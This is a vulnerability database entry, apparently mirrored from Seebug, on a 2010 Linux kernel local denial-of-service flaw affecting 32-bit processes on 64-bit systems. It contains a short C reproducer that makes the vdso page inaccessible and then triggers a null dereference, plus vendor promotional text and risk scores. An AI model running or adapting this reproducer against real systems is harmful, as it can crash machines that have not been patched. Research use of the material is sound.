Lucene search
K

Linux Kernel 64位系统上32位进程本地拒绝服务漏洞

🗓️ 21 Mar 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

Linux Kernel 64-bit system local denial of service vulnerabilit

Related
Code

                                                Would this be a valid reproducer? :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

int main(){
        FILE *f;
        char line[256];
        void *x,*y;

        f = fopen("/proc/self/maps","r");
        if (!f) exit(1);

        x=y=NULL;
        while (fgets(line,sizeof(line),f)) {
                if (strstr(line,"vdso")) {
                        sscanf(line,"%p-%p ",&x,&y);
                        fprintf(stderr,"vdso %x\n", x);
                        break;
                }
        }
        if (!x) exit(1);

        mprotect(x,4096, PROT_NONE);
        *(char*)NULL = NULL;
}

Ciao, Marcus

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Mar 2010 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.00047
25